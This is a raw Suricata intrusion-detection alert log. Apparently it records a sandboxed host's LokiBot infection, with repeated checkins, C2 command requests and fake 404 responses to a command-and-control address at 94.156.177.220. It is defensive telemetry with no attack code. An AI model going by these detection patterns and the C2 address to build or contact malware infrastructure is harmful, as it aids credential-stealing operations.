Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49844
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49771
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49889
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49809
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49784
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49850
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49792
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49895
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49815
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49901
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49778
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49924
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49964
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49931
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49873
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49912
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49918
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49940
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49882
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49749
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49838
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49829
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50019
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50041
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50027
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50040
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49947
